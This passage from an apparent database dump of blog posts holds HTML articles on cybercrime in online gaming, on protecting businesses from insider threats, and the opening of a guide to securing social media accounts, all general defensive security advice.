Unfortunately, like in the real world, these virtual cities witnessed the rise of criminal behaviors. Where players once gathered for cooperation and creativity, cyberbullying, hacking, and data theft began to unfold.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Cybercrimes in the Gaming Universe</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Virtual worlds, by their very nature, encourage anonymity—a feature beloved by gamers but exploited by cybercriminals. Some of the common cybercrimes happening within online gaming ecosystems include:</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Identity Theft and Data Breaches</strong></b></li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Gaming servers often lure players into sharing personal information, whether during user registration or through in-game interactions. 
It\'s alarmingly easy for cybercriminals to use this data as a weapon, stealing identities or misusing stolen credentials for nefarious purposes.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\"><i><em class=\"italic\">Example</em></i>: Imagine a cheater’s personal data being leaked onto a server and malicious players taking advantage of this to commit further crimes.</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Bullying and Harassment</strong></b></li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Seemingly innocent gaming platforms can quickly become hostile for players, especially teenagers. Bullies take control of characters and environments, pushing their targets to the edge—often leaking their personal details as part of the harassment. For younger players, this can lead to discomfort, mental health challenges, or, worse, leaving them vulnerable to predatory actions.</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Hacking and Exploiting Weaknesses</strong></b></li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Cybercriminals thrive in digital spaces with insufficient security measures. 
By hacking into gaming servers or accounts, they can steal in-game assets or even use gaming servers to launch malicious programs like ransomware attacks.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Why Awareness and Action Are Urgently Needed</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">The gaming industry\'s rapid growth has outpaced discussions around security. Parents and educators, in particular, need to realize the risks online gaming can pose. This is about more than harmless trolling—these practices have real-world consequences. Teen players being unwittingly drawn into criminal behaviors, from minor scams to major fraud, is a growing concern.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">How Can We Bolster Security in Online Gaming?</h3>\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Implement Stricter Gaming Regulations</strong></b></li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Governments and gaming corporations need to work together to enforce transparency and safety policies. 
Requirements related to data protection, user behavior monitoring, and secure user verification could go a long way in mitigating risks.</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Educating Parents and Educators</strong></b></li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Parents and teachers play a critical role in ensuring gaming remains safe and enjoyable. Monitoring screen time, initiating open conversations about online risks, and helping children recognize predatory behaviors can make all the difference.</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Advocating for Better Built-in Security</strong></b></li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Gaming developers must take security as seriously as gameplay and graphics. Key features like two-factor authentication should become standard, while regular bug scans should ensure platforms remain hard targets for cyberattacks.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">A Growing Call to Action</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Virtual worlds should be fun, interactive, and safe—but the harsh reality is that, without better safeguards in place, these environments pose risks no parent, gamer, or educator can afford to overlook. 
By advocating for stronger protections and increasing discussions around cybersecurity, we can help gaming evolve into a more secure space for everyone.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">If you\'re a parent, educator, gamer, or even a cybersecurity advocate, now is the time to act. Learn about the hidden risks woven into online gaming platforms and stay informed so you can advocate for smarter, safer virtual worlds. Only then can we truly unlock gaming\'s potential—without compromising its integrity.</p>', '', NULL, NULL, 1, 'draft', '2025-02-10 21:34:04', '2026-01-12 21:41:44', 'CyberKids', 'The Dark Side of Gaming: How Virtual Worlds Are Fuels for Cybercrime', '', NULL),
(45, 'How to Protect Your Business from Insider Threats', 'how-to-protect-your-business-from-insider-threats', '<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Insider threats pose a serious, often underestimated risk to businesses of all sizes. These security challenges come not from hackers or external attackers, but from individuals inside the organization. These might include employees, contractors, or business partners who have access to the company’s systems, data, or infrastructure. For IT security experts, cybersecurity learners, and small business owners, addressing insider threats is critical to safeguarding sensitive data, intellectual property, and overall business operations.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">This article provides strategies and actionable insights into understanding, identifying, and mitigating insider threats. Whether you\'re a seasoned IT professional or a small business owner looking to strengthen your defenses, the points outlined below will help you take a proactive approach.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Understanding Insider Threats</h2>\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Types of Insider Threats</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Recognizing the different forms insider threats can take is the first step toward prevention:</p>\r\n\r\n<ol class=\"pt-[9px] pb-[2px] pl-[24px] [&amp;_ol]:pt-[5px] list-decimal\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Malicious 
Insiders</strong></b>:</li>\r\n</ol>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">These are employees or partners with malicious intent who exploit their access to harm the organization, often for personal gain or external influence.</p>\r\n\r\n<ol class=\"pt-[9px] pb-[2px] pl-[24px] [&amp;_ol]:pt-[5px] list-decimal\" start=\"2\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\"><b><strong class=\"font-bold\">Negligent Insiders</strong></b>:</li>\r\n</ol>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Employees who unintentionally cause security breaches due to carelessness or lack of knowledge, such as clicking on phishing links or mishandling sensitive data.</p>\r\n\r\n<ol class=\"pt-[9px] pb-[2px] pl-[24px] [&amp;_ol]:pt-[5px] list-decimal\" start=\"3\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\"><b><strong class=\"font-bold\">Compromised Insiders</strong></b>:</li>\r\n</ol>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">When external attackers gain access to systems by manipulating or deceiving an internal employee (e.g., via phishing or social engineering).</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Key Indicators of Insider Threats</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">It’s crucial to detect the warning signs of potential insider threats early. 
Common indicators include:</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">Behavioral changes, such as disgruntled or secretive attitudes.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">Unusual data access patterns or large, unauthorized transfers.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"3\">Employees holding excessive or unnecessary access privileges.</li>\r\n</ul>\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Identifying Risks</h2>\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Vulnerable Areas</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Insider threats often center around specific business vulnerabilities, such as:</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Intellectual Property and Sensitive Data</strong></b>:</li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Proprietary information, trade secrets, and customer databases are prime targets.</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] 
my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Network and System Access</strong></b>:</li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Gaining direct access to your organization’s network can lead to wide-reaching damage.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Common Scenarios</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Understanding common threat scenarios can help businesses craft better mitigation strategies:</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Data Theft by Departing Employees</strong></b>:</li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Employees leaving the company might take sensitive data with them, either knowingly or accidentally.</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Privilege Abuse by IT Staff</strong></b>:</li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">IT professionals are often given high levels of system access, which can be misused if not properly managed.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Risk Assessment</h3>\r\n<p class=\"text-body 
font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">To identify potential risks, businesses should:</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">Conduct regular audits of both cybersecurity measures and access logs.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">Determine which assets are critical and require the most robust protection.</li>\r\n</ul>\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Prevention Strategies</h2>\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Access Control and Privilege Management</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Implementing strict access controls ensures that employees only have permissions necessary to perform their jobs:</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Least Privilege Principles</strong></b>:</li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Restrict employee access to only what is essential for their role.</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" 
value=\"1\"><b><strong class=\"font-bold\">Regularly Review User Access</strong></b>:</li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Reassess privileges periodically, especially for employees who change roles or departments.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Employee Education and Training</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Your employees are your first line of defense against insider threats. Effective education includes:</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">Hosting <b><strong class=\"font-bold\">cybersecurity awareness sessions</strong></b> to teach employees how to recognize phishing attacks and other social engineering tactics.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">Fostering a <b><strong class=\"font-bold\">culture of accountability</strong></b>, where employees understand their role in maintaining security.</li>\r\n</ul>\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Monitoring and Detection</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Technological solutions can add an extra layer of oversight:</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" 
value=\"1\"><b><strong class=\"font-bold\">Security Information and Event Management (SIEM)</strong></b> tools to track and detect unusual behavior.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">Introducing <b><strong class=\"font-bold\">User Behavior Analytics (UBA)</strong></b> to identify patterns or anomalies that could indicate a threat.</li>\r\n</ul>\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Incident Response</h2>\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Developing an Insider Threat Response Plan</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Even with prevention strategies in place, incidents may still occur. 
A defined insider threat response plan should include:</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">Immediate steps to contain the threat and limit damage.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">Clear roles and responsibilities for your Incident Response Team (IRT).</li>\r\n</ul>\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Post-Incident Analysis</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">After resolving an incident, conduct a thorough post-mortem analysis:</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">Identify weaknesses in your policies or systems that allowed the threat to occur.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">Use findings to update processes and improve overall security measures.</li>\r\n</ul>\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Legal and Ethical Considerations</h2>\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Balancing Security and Privacy</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" 
dir=\"ltr\">It’s critical to ensure that security measures respect employee privacy while complying with relevant data protection laws:</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Transparent Policies</strong></b>:</li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Outline how employee activity is monitored and how such data is stored and used.</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Compliance with Laws</strong></b>:</li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Ensure processes align with regulations such as GDPR, CCPA, and other privacy laws.</p>\r\n\r\n<h3 class=\"font-bold text-h4 leading-[30px] pt-[15px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Engaging Legal Teams</h3>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Proactively involve your legal team to:</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\">Draft contracts and policies that outline repercussions for insider threats.</li>\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"2\">Ensure legal coverage in the event of a malicious insider 
incident.</li>\r\n</ul>\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Tools and Technologies for Insider Threat Management</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Technology has become an essential part of insider threat management. Popular tools include:</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">SIEM Solutions</strong></b>:</li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Tools like Splunk and LogRhythm to detect real-time anomalies.</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Data Loss Prevention (DLP) Systems</strong></b>:</li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Protect sensitive data from leaving network environments.</p>\r\n\r\n<ul class=\"pt-[9px] pb-[2px] pl-[24px] list-disc [&amp;_ul]:pt-[5px] pt-[5px]\">\r\n 	<li class=\"text-body font-regular leading-[24px] my-[5px] [&amp;&gt;ol]:!pt-0 [&amp;&gt;ol]:!pb-0 [&amp;&gt;ul]:!pt-0 [&amp;&gt;ul]:!pb-0\" value=\"1\"><b><strong class=\"font-bold\">Endpoint Detection and Response (EDR) Tools</strong></b>:</li>\r\n</ul>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Solutions such as CrowdStrike and Carbon Black for monitoring endpoint activity.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] 
[&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Conclusion</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Insider threats are a reality for businesses across industries, but they don’t have to be a liability if addressed proactively. By understanding the nature of insider threats, reducing risks, and implementing robust prevention strategies, businesses can protect their assets, operations, and reputations.</p>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\"><b><strong class=\"font-bold\">Take Action Today:</strong></b> Don’t wait for an incident to assess your insider threat strategy. Start implementing these best practices now to strengthen your defenses and create a culture of awareness and accountability. Remember, staying ahead of potential threats is a continuous process—adaptation and vigilance are key.</p>', '', NULL, NULL, 1, 'draft', '2025-02-10 21:22:34', '2026-01-12 21:41:44', 'Information Security', 'How to Protect Your Business from Insider Threats', '', NULL),
(46, 'Tips for Keeping Your Social Media Accounts Secure', 'tips-for-keeping-your-social-media-accounts-secure', '<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Social media platforms have become an integral part of both our personal and professional lives. From sharing daily updates to building brand recognition, these platforms offer incredible opportunities. However, they also come with significant risks. For IT security experts and cybersecurity learners, safeguarding social media accounts is not just crucial; it’s essential. Whether you\'re a business protecting sensitive data or an individual with a large following, taking proactive steps to secure your accounts can prevent costly breaches. Here’s a detailed guide to help you keep your social media accounts secure.</p>\r\n\r\n<h2 class=\"font-bold text-h3 leading-[40px] pt-[21px] pb-[2px] [&amp;_a]:underline-offset-[6px] [&amp;_.underline]:underline-offset-[6px]\" dir=\"ltr\">Why is Securing Social Media Accounts Important?</h2>\r\n<p class=\"text-body font-regular leading-[24px] pt-[9px] pb-[2px]\" dir=\"ltr\">Social media accounts are more than just communication tools; they are gateways to personal data, professional files, and sometimes, customer information. Imagine a hacker gaining access to an influencer\'s account with millions of followers or a company’s Twitter handle. These breaches often lead to brand reputation damage, data theft, and financial 